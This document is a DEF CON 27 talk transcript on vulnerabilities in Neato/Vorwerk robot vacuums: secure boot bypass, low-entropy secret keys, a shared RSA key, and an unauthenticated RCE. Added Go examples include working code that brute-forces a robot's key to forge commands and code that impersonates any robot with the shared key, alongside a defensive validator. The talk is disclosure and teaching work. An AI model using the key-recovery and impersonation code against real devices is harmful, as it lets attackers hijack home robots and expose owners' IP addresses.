DEF CON 27- JISKA FABIAN - vacuum cleaning security
- 1. Vacuum Cleaning Security
Pinky and the Brain Edition
Jiska Classen
Secure Mobile Networking Lab - SEEMOO
Technische Universität Darmstadt, Germany
Fabian Ullrich
IT Security Analyst @ ERNW GmbH
Heidelberg, Germany
- 3. 3
● A vacuum cleaning robot is in your house, has access to your Wi-Fi and knows
many of your personal habits.
● Who of you owns a vacuum cleaning robot?
● (Own as in it's YOUR robot, neither your neighbor's nor someone's on the Internet!)
● Neato is one of the top vacuum cleaning robot models in the US.
● In Germany, Vorwerk has been selling vacuum cleaners forever (founded 1883).
Their top model, a robot, is a rebranded Neato.
● Vorwerk won the test comparisons in Germany with their VR300/VR200.
Motivation
- 4. 4
● Robots were harmed during our experiments! (Sorry for that…)
● No customer data was leaked.
● Neato was informed and fixed all issues in time.
Responsible Disclosure
- 9. 9
Infrastructure & Security Features
Diagram (text recovered from the figure; the grouping by component follows the labels on the slide):
● Nucleo (cloud): robot commands / status from the app; robot commands and status responses to the robot.
✔ HTTPS ✔ RSA key (robot↔cloud) ✔ Secret key (robot↔user)
● Beehive (cloud): account information.
✔ HTTPS
● Robot: ✔ Secure boot ✔ Encrypted logs ✔ Signed firmware updates
● App ↔ robot: ✔ HTTPS ✔ Secret key (robot↔user)
● UI & USB console: manual robot commands; setup-only channel: ??
- 11. 11
● With all these security features, what could possibly go wrong?
● We bypass secure boot on a vacuum cleaning robot to extract its memory.
● Our key findings are…
○ … key findings!
○ And a QNX side quest.
● We also gained unauthenticated RCE on robots over the cloud.
Contributions
- 12. 12
● Custom AM335x chip (guessed from the form factor).
● QNX 6.5 image from Foundry27 is bootable but crashes.
● Get QNX SDP, modify image, skip hardware initialization,
reboot Neato system into custom image for cold boot attack,
print all RAM to the serial port.
● Watchdog started by Pinky,
● Cleaning logic binary started by Brain.
Secure Boot Bypass
Jiska found this, got assigned CVE-2018-20785, fixed in Neato BotVac Connected D7 4.4.0-72 in December 2018 and for Vorwerk sometime after January 2019.
- 14. 14
Secret Key
● Generated when associating a robot with a user account.
● Known by: robot, app and cloud components.
● Individual key for each robot/user account relation!
Used for authenticating commands to robot.
Keys and their Purpose (1)
Header = Authorization: NEATOAPP [signature]
string_to_sign = serial + date + message_body
signature = HMAC_SHA256(secret_key, string_to_sign)
https://developers.neatorobotics.com/
- 15. 15
RSA Key
● Robots have to initially send the secret key
○ Has to be authenticated.
● Secret key not that secret
○ Several third parties know it.
○ Cannot be used to authenticate the robot in the cloud.
RSA Key used to authenticate robot to cloud.
Keys and their Purpose (2)
- 16. 16
RSA Key
● Robots have to initially send the secret key
○ Has to be authenticated.
● Secret key not that secret
○ Several third parties know it.
○ Cannot be used to authenticate the robot in the cloud.
RSA Key used to authenticate robot to cloud.
Keys and their Purpose (2)
Header = Authorization: NEATOBOT [serial]:[signature]
string_to_sign = serial + http_method + URI + date + body
signature = sign_rsa_sha256(string_to_sign, rsa_private_key)
- 19. 19
● The only real entropy is the time of robot linkage (the robot MAC is not secret,
and rand() contributes a single byte).
○ Linkage somewhere within one year ≈ 25 bit
○ Linkage somewhere within one hour ≈ 12 bit
● There are multiple offline attack scenarios.
Secret Key Entropy Reduction
Fabian found and analyzed this beautiful piece of code! Got assigned CVE-2018-19441.
rnd = rand();

time_shift[0:3] = time_now;                                 // 4 bytes of wall-clock time
time_shift[4:6] = 0;                                        // 3 constant bytes
time_shift[7] = 16;                                         // 1 constant byte
time_shift[8] = rnd + rnd / 0xFFFF;                         // rand() output truncated to 1 byte
time_shift[9] = entropy_reducing_math(rnd + rnd / 0xFFFF);  // derived from that same byte
time_shift[10:15] = robot_MAC;                              // 6 bytes, the robot's Wi-Fi MAC
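An added example, not code from the talk, that turns the slide's pseudocode into a search: it rebuilds the 16-byte time_shift buffer, signs one NEATOAPP request with the resulting key as on slide 14, and then recovers the key from that single captured request and the robot's MAC by trying every linkage second in a window and every value of the rand() byte. The buffer layout follows the slide; the byte order of the time, hashing the buffer with SHA-256 before use, and the body of entropy_reducing_math are assumptions, and all serials, dates, MACs and message bodies are constructed. A one-hour window costs at most 3600 × 256 ≈ 2^20 candidates, the slide's 12 bits plus the 8 bits of the rand() byte.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/binary"
	"encoding/hex"
	"fmt"
)

// rndByte truncates the slide's "rnd + rnd / 0xFFFF" to the single byte that
// ends up in the key buffer: whatever rand() returned, only 8 bits survive.
func rndByte(rnd uint32) byte { return byte(rnd + rnd/0xFFFF) }

// entropyReducingMath stands in for the function the slide names but does
// not show. ASSUMPTION: any deterministic function of the byte; it adds no
// entropy because its input is already fixed once ts[8] is fixed.
func entropyReducingMath(b byte) byte { return b ^ 0x5a }

// buildKeyMaterial fills the 16-byte time_shift buffer as laid out on the
// slide: [0:3] time, [4:6] zero, [7] = 16, [8] and [9] from rand(),
// [10:15] the robot's Wi-Fi MAC. Big-endian time is an ASSUMPTION.
func buildKeyMaterial(timeNow uint32, r byte, mac [6]byte) [16]byte {
	var ts [16]byte
	binary.BigEndian.PutUint32(ts[0:4], timeNow)
	ts[7] = 16
	ts[8] = r
	ts[9] = entropyReducingMath(r)
	copy(ts[10:16], mac[:])
	return ts
}

// secretKey hashes the material before use (ASSUMPTION, suggested by slide
// 33's "check entropy before hashing"). Hashing hides the structure but
// cannot add entropy: the output is still one of (seconds x 256) values.
func secretKey(material [16]byte) []byte {
	h := sha256.Sum256(material[:])
	return h[:]
}

// signNeatoApp builds the NEATOAPP header value from slide 14:
// HMAC-SHA256(secret_key, serial + date + message_body), hex encoded.
func signNeatoApp(key []byte, serial, date, body string) string {
	m := hmac.New(sha256.New, key)
	m.Write([]byte(serial + date + body))
	return hex.EncodeToString(m.Sum(nil))
}

// recoverSecretKey is the offline attack: from one captured signed request
// and the robot's MAC, try every linkage second in [tStart, tEnd) and every
// value of the rand() byte until the HMAC over the captured message matches.
func recoverSecretKey(sigHex, serial, date, body string, mac [6]byte, tStart, tEnd uint32) ([16]byte, bool) {
	want, err := hex.DecodeString(sigHex)
	if err != nil {
		return [16]byte{}, false
	}
	msg := []byte(serial + date + body)
	for t := tStart; t < tEnd; t++ {
		for r := 0; r < 256; r++ {
			cand := buildKeyMaterial(t, byte(r), mac)
			m := hmac.New(sha256.New, secretKey(cand))
			m.Write(msg)
			if hmac.Equal(m.Sum(nil), want) {
				return cand, true
			}
		}
	}
	return [16]byte{}, false
}

func main() {
	// Constructed values: a robot linked at linkTime with this MAC, and one
	// command the attacker captured (serial, Date header, body, signature).
	mac := [6]byte{0x00, 0x11, 0x22, 0x33, 0x44, 0x55}
	linkTime := uint32(1540000000)
	material := buildKeyMaterial(linkTime, rndByte(0x1234abcd), mac)
	key := secretKey(material)
	serial, date, body := "OPS12345-EXAMPLE", "Thu, 25 Oct 2018 12:00:00 GMT", `{"reqId":"1","cmd":"startCleaning"}`
	sig := signNeatoApp(key, serial, date, body)

	// The attacker knows only the MAC and that linkage happened within an hour.
	found, ok := recoverSecretKey(sig, serial, date, body, mac, linkTime-1800, linkTime+1800)
	fmt.Println("key recovered:", ok && found == material)
	if ok {
		forged := signNeatoApp(secretKey(found), serial, date, `{"reqId":"2","cmd":"startCleaning"}`)
		fmt.Println("forged signature for a new command:", forged)
	}
}
```

Running it prints whether the key came back and a forged signature for a second command. The part worth reading is recoverSecretKey: once the key material is a function of public or near-public inputs, hashing it before use changes nothing about the attacker's work, which is why the slide's remedy is to check entropy before hashing rather than to hash harder.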
- 22. 22
● Encrypted RSA keys in /var/keys.
● vendorPrivateKeyProduction sounds promising!
● Let’s do some string de-obfuscation!
RSA Keys for Robot Authenticity (1)
● RSA key is the same for all robots.
- 27. 27
● We are able to impersonate arbitrary robots.
○ Allows for multiple other attacks.
○ For example: Leak victim’s smartphone IP.
RSA Keys for Robot Authenticity (2)
Diagram (sequence, reconstructed from the labels in the figure): the attacker talks to Nucleo as the victim's robot, and the real robot "does no longer get requests". The app asks "Robot location?"; Nucleo answers "Robot location is 1.3.3.7:42", the address the impersonating attacker is reachable at. The app's "Manual drive…" connection then goes to 1.3.3.7:42, which reveals the smartphone's IP to the attacker.
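The NEATOBOT scheme from slide 16 and the impersonation on slides 21 to 27, as an added example in Go rather than code from the talk. It signs `serial + http_method + URI + date + body` with RSA-SHA256, has the cloud side verify it, and then shows that a single vendor-wide private key lets its holder sign for any serial. PKCS#1 v1.5 padding and base64 encoding of the signature are assumptions (the slide only says sign_rsa_sha256), and the request path, body and serials are constructed; the key is generated at runtime in place of the extracted vendorPrivateKeyProduction.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/base64"
	"errors"
	"fmt"
	"strings"
)

// stringToSign follows slide 16: serial + http_method + URI + date + body.
func stringToSign(serial, method, uri, date, body string) []byte {
	return []byte(serial + method + uri + date + body)
}

// newVendorKey stands in for vendorPrivateKeyProduction. In the real
// deployment one such key sat in every robot's /var/keys.
func newVendorKey() *rsa.PrivateKey {
	k, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		panic(err)
	}
	return k
}

// signNeatoBot builds "Authorization: NEATOBOT [serial]:[signature]".
// PKCS#1 v1.5 padding and base64 are ASSUMPTIONS; the slide does not show them.
func signNeatoBot(priv *rsa.PrivateKey, serial, method, uri, date, body string) (string, error) {
	digest := sha256.Sum256(stringToSign(serial, method, uri, date, body))
	sig, err := rsa.SignPKCS1v15(rand.Reader, priv, crypto.SHA256, digest[:])
	if err != nil {
		return "", err
	}
	return "NEATOBOT " + serial + ":" + base64.StdEncoding.EncodeToString(sig), nil
}

// verifyNeatoBot is the cloud side. It returns the serial the request claims
// once the signature checks out. With one vendor-wide public key a valid
// signature proves possession of the vendor key, not that the request came
// from the robot with that serial.
func verifyNeatoBot(pub *rsa.PublicKey, header, method, uri, date, body string) (string, error) {
	if !strings.HasPrefix(header, "NEATOBOT ") {
		return "", errors.New("not a NEATOBOT header")
	}
	parts := strings.SplitN(strings.TrimPrefix(header, "NEATOBOT "), ":", 2)
	if len(parts) != 2 {
		return "", errors.New("missing serial:signature")
	}
	serial := parts[0]
	sig, err := base64.StdEncoding.DecodeString(parts[1])
	if err != nil {
		return "", err
	}
	digest := sha256.Sum256(stringToSign(serial, method, uri, date, body))
	if err := rsa.VerifyPKCS1v15(pub, crypto.SHA256, digest[:], sig); err != nil {
		return "", err
	}
	return serial, nil
}

// impersonate is the attack from slides 21 to 27: whoever extracted the
// shared key signs a request for any victim serial and the cloud accepts it
// as that robot. Path and body are constructed; the real robot-to-Nucleo
// paths are not on the slides.
func impersonate(vendorKey *rsa.PrivateKey, victimSerial string) (string, error) {
	method, uri := "POST", "/example/robots/"+victimSerial+"/location"
	date, body := "Thu, 25 Oct 2018 12:00:00 GMT", `{"ip":"1.3.3.7","port":42}`
	hdr, err := signNeatoBot(vendorKey, victimSerial, method, uri, date, body)
	if err != nil {
		return "", err
	}
	return verifyNeatoBot(&vendorKey.PublicKey, hdr, method, uri, date, body)
}

func main() {
	vendorKey := newVendorKey()
	for _, victim := range []string{"OPS12345-ALICE", "OPS67890-BOB"} {
		serial, err := impersonate(vendorKey, victim)
		fmt.Printf("cloud attributes the request to %q (err=%v)\n", serial, err)
	}
}
```

The verifier is not the bug; it does what a per-vendor key allows. The fix the slides point at is a per-robot key (or a per-robot certificate chained to the vendor key), so that extracting one robot's key only ever impersonates that robot.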
- 28. 28
● Power plants, cars, and other critical applications run on QNX < 6.6. Today.
● The current version is 7.x, but many vendors might not have updated it so far.
● Default settings: no ASLR, no DEP :).
● The robots run on QNX 6.5 … Side quest: How secure is it?
We ❤ QNX < 6.6
Fabian and Johannes created a PoC for privilege escalation and got assigned CVE-2019-8998. http://support.blackberry.com/kb/articleDetail?articleNumber=000057178
- 31. 31
● Buffer overflow in the robot's Nucleo cloud connection daemon.
● Can be triggered with requests to https://nucleo.neatocloud.com:4443/vendors/neato/robots/[robot_serial]/messages.
● The overflow is within parsing the authentication header, which means that we found an unauthenticated RCE!
● All services run as root.
● Fix: Authentication headers are validated on Nucleo.
Unauthenticated RCE
Fabian found the crash and performed analysis, Jiska decrypted the coredump (CVE-2018-17177), Johannes did further analysis and implemented a PoC (CVE-2018-19442).
Diagram (text recovered from the figure): Nucleo → robot; /bin/astro, /bin/robot; Buffer Overflow.
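One shape the fix on slide 31 can take, as an added example that is not Neato's code: Nucleo checks the NEATOAPP header's length, scheme and encoding and then the HMAC from slide 14 before anything is forwarded, so the robot's native parser never sees an oversized or unauthenticated header. The length limit, the error names and all sample values are assumptions constructed for the example.

```go
package main

import (
	"crypto/hmac"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"strings"
)

// Limits enforced before anything reaches the robot. ASSUMPTION for the
// example: a NEATOAPP value is a 32-byte HMAC-SHA256 digest in hex, so a
// well-formed header is always exactly len(prefix) + 64 bytes.
const (
	neatoAppPrefix = "NEATOAPP "
	hexSigLen      = 64
	maxHeaderLen   = len(neatoAppPrefix) + hexSigLen
)

var (
	ErrTooLong   = errors.New("authorization header longer than any valid value")
	ErrMalformed = errors.New("authorization header malformed")
	ErrBadSig    = errors.New("signature does not match")
)

// signNeatoApp is the legitimate app side from slide 14, used here only to
// produce a valid header for the demonstration.
func signNeatoApp(key []byte, serial, date, body string) string {
	m := hmac.New(sha256.New, key)
	m.Write([]byte(serial + date + body))
	return neatoAppPrefix + hex.EncodeToString(m.Sum(nil))
}

// validateNeatoAppHeader is the cloud-side gate. Order matters: cheap
// structural checks (length, scheme, charset) run before any crypto, and a
// request is forwarded to the robot only after the HMAC for this robot/user
// pair verifies. An attacker without the secret key therefore never reaches
// the robot's parser at all.
func validateNeatoAppHeader(header string, key []byte, serial, date, body string) error {
	if len(header) > maxHeaderLen {
		return ErrTooLong
	}
	if !strings.HasPrefix(header, neatoAppPrefix) {
		return ErrMalformed
	}
	sig, err := hex.DecodeString(header[len(neatoAppPrefix):])
	if err != nil || len(sig) != hexSigLen/2 {
		return ErrMalformed
	}
	m := hmac.New(sha256.New, key)
	m.Write([]byte(serial + date + body))
	if !hmac.Equal(m.Sum(nil), sig) {
		return ErrBadSig
	}
	return nil
}

func main() {
	// Constructed: the secret key of one robot/user pair and one command as
	// the app would send it to /vendors/neato/robots/[serial]/messages.
	key := []byte("constructed-secret-key-for-demo")
	serial, date, body := "OPS12345-EXAMPLE", "Thu, 25 Oct 2018 12:00:00 GMT", `{"reqId":"1","cmd":"getRobotState"}`

	cases := map[string]string{
		"valid":      signNeatoApp(key, serial, date, body),
		"oversized":  neatoAppPrefix + strings.Repeat("A", 4096), // the kind of input the robot's parser had to survive before the fix
		"wrong key":  signNeatoApp([]byte("other"), serial, date, body),
		"bad scheme": "Basic dXNlcjpwYXNz",
	}
	for name, hdr := range cases {
		err := validateNeatoAppHeader(hdr, key, serial, date, body)
		fmt.Printf("%-10s forwarded=%-5v err=%v\n", name, err == nil, err)
	}
}
```

The length check is deliberately the first line: it bounds what any downstream parser, in Go or in the robot's C, will ever be handed, and it costs nothing. Verifying the HMAC in the cloud also restores the property the slide title denies, namely that reaching the robot's code requires authentication.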
- 32. 32
● IoT product at home? Keep it offline!
● As a customer:
○ Update your robot.
○ Hide your robot’s serial number!
Security Implications (1)
- 33. 33
● Connected ecosystem developers:
○ Using RSA, RNG, hashing, secure boot, encrypted logs, signed firmware updates sounds good...
○ Review cryptographic key components and root of trust assumptions.
○ Dissecting one of your products should not compromise security of the other products, i.e., no keys shared across devices.
○ Test your security-relevant code in practice to uncover issues like the static secret key “random” function: check entropy before hashing.
Security Implications (2)